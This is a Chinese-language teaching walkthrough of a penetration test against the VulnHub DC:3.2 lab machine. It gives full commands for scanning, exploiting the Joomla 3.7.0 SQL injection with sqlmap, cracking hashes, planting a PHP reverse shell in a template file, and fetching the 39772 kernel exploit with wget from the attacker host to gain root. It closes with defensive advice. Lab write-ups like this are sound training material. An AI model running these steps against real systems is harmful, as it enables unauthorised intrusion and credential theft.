DC:3.2
字数 1240 2025-08-19 12:42:07

DC:3.2 靶机渗透测试教学文档

一、环境准备

靶机信息

  • 名称: DC:3.2
  • 下载地址: https://www.vulnhub.com/entry/dc-32,312/
  • 默认IP: 192.168.44.135 (可能需根据实际网络环境调整)

攻击机配置

  • 推荐IP: 192.168.44.133
  • 所需工具:
    • nmap/arp-scan
    • sqlmap
    • John the Ripper
    • netcat
    • Python

二、信息收集阶段

1. 主机发现

nmap -sn 192.168.44.0/24
# 或
arp-scan -I eth0 -l

2. 端口扫描

nmap -sV -p- 192.168.44.135

发现结果:

  • 开放端口: 80 (Apache/2.4.18)
  • 内核版本范围: 3.2-4.9

3. Web目录扫描

使用工具如dirb、gobuster或dirsearch:

gobuster dir -u http://192.168.44.135 -w /path/to/wordlist.txt

重要发现:

  • /administrator/index.php: Joomla后台登录页面
  • /readme.txt: 显示Joomla版本为3.7.0

三、漏洞利用阶段

1. Joomla 3.7.0 SQL注入漏洞利用

漏洞参考:
安全客-Joomla!3.7.0 SQL注入漏洞分析

使用sqlmap进行利用:

sqlmap -u "http://192.168.44.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --technique=U --dbms=mysql --batch --dbs

关键点:

  • 表名中包含星号(*)时需要转义或引号包裹
  • 获取用户表数据:
sqlmap -u "http://192.168.44.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C username,password --dump

2. 密码破解

使用John the Ripper破解获取的哈希:

john --wordlist=/path/to/wordlist.txt hash.txt

破解结果: 密码为"snoopy"

3. 后台登录与Webshell上传

  1. 访问/administrator/index.php使用获取的凭据登录
  2. 导航至: Extensions > Templates > Beez3
  3. 编辑error.php文件,插入PHP反向shell代码
    • 可使用/usr/share/webshells/php/php_reverse.php
    • 修改监听IP和端口

4. 获取反向Shell

  1. 在攻击机启动监听:
nc -lvnp 4444
  1. 访问包含webshell的页面触发连接

5. 交互式Shell升级

python -c 'import pty;pty.spawn("/bin/bash")'

四、权限提升阶段

1. 初始提权尝试

sudo -l  # 需要密码
uname -a # 查看内核版本

2. 内核漏洞利用

发现39772.txt文件,内容提示:

  • 存在可利用的内核漏洞
  • 成功执行可在60秒内获取root权限

利用步骤:

  1. 在攻击机启动Python HTTP服务:
python2 -m SimpleHTTPServer 8000
  1. 在目标机下载利用程序:
cd /tmp
wget http://192.168.44.133:8000/39772.zip
  1. 解压并编译:
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

3. 获取flag

成功提权后:

cat /root/flag

五、关键知识点总结

  1. 信息收集:

    • 主机发现与端口扫描是渗透测试基础
    • Web目录扫描可发现隐藏资源
    • 版本信息泄露是常见漏洞来源

  2. 漏洞利用:

    • 已知CMS版本应立即搜索相关漏洞
    • SQL注入利用需注意特殊字符处理
    • 密码破解是常见提权手段

  3. 权限提升:

    • 内核漏洞是Linux系统常见提权方式
    • 利用文件传输技巧克服环境限制
    • 编译型漏洞利用需注意目标环境兼容性

  4. 后渗透:

    • 交互式shell提升操作便利性
    • 系统信息收集为后续攻击提供方向

六、防御建议

  1. 及时更新CMS系统和插件
  2. 使用强密码策略
  3. 限制后台文件修改权限
  4. 定期更新操作系统内核
  5. 实施最小权限原则
  6. 监控系统日志和异常行为
DC:3.2 靶机渗透测试教学文档 一、环境准备 靶机信息 名称: DC:3.2 下载地址: https://www.vulnhub.com/entry/dc-32,312/ 默认IP: 192.168.44.135 (可能需根据实际网络环境调整) 攻击机配置 推荐IP: 192.168.44.133 所需工具: nmap/arp-scan sqlmap John the Ripper netcat Python 二、信息收集阶段 1. 主机发现 2. 端口扫描 发现结果 : 开放端口: 80 (Apache/2.4.18) 内核版本范围: 3.2-4.9 3. Web目录扫描 使用工具如dirb、gobuster或dirsearch: 重要发现 : /administrator/index.php : Joomla后台登录页面 /readme.txt : 显示Joomla版本为3.7.0 三、漏洞利用阶段 1. Joomla 3.7.0 SQL注入漏洞利用 漏洞参考 : 安全客-Joomla!3.7.0 SQL注入漏洞分析 使用sqlmap进行利用 : 关键点 : 表名中包含星号(* )时需要转义或引号包裹 获取用户表数据: 2. 密码破解 使用John the Ripper破解获取的哈希: 破解结果 : 密码为"snoopy" 3. 后台登录与Webshell上传 访问 /administrator/index.php 使用获取的凭据登录 导航至: Extensions > Templates > Beez3 编辑 error.php 文件,插入PHP反向shell代码 可使用 /usr/share/webshells/php/php_reverse.php 修改监听IP和端口 4. 获取反向Shell 在攻击机启动监听: 访问包含webshell的页面触发连接 5. 交互式Shell升级 四、权限提升阶段 1. 初始提权尝试 2. 内核漏洞利用 发现 39772.txt 文件,内容提示: 存在可利用的内核漏洞 成功执行可在60秒内获取root权限 利用步骤 : 在攻击机启动Python HTTP服务: 在目标机下载利用程序: 解压并编译: 3. 获取flag 成功提权后: 五、关键知识点总结 信息收集 : 主机发现与端口扫描是渗透测试基础 Web目录扫描可发现隐藏资源 版本信息泄露是常见漏洞来源 漏洞利用 : 已知CMS版本应立即搜索相关漏洞 SQL注入利用需注意特殊字符处理 密码破解是常见提权手段 权限提升 : 内核漏洞是Linux系统常见提权方式 利用文件传输技巧克服环境限制 编译型漏洞利用需注意目标环境兼容性 后渗透 : 交互式shell提升操作便利性 系统信息收集为后续攻击提供方向 六、防御建议 及时更新CMS系统和插件 使用强密码策略 限制后台文件修改权限 定期更新操作系统内核 实施最小权限原则 监控系统日志和异常行为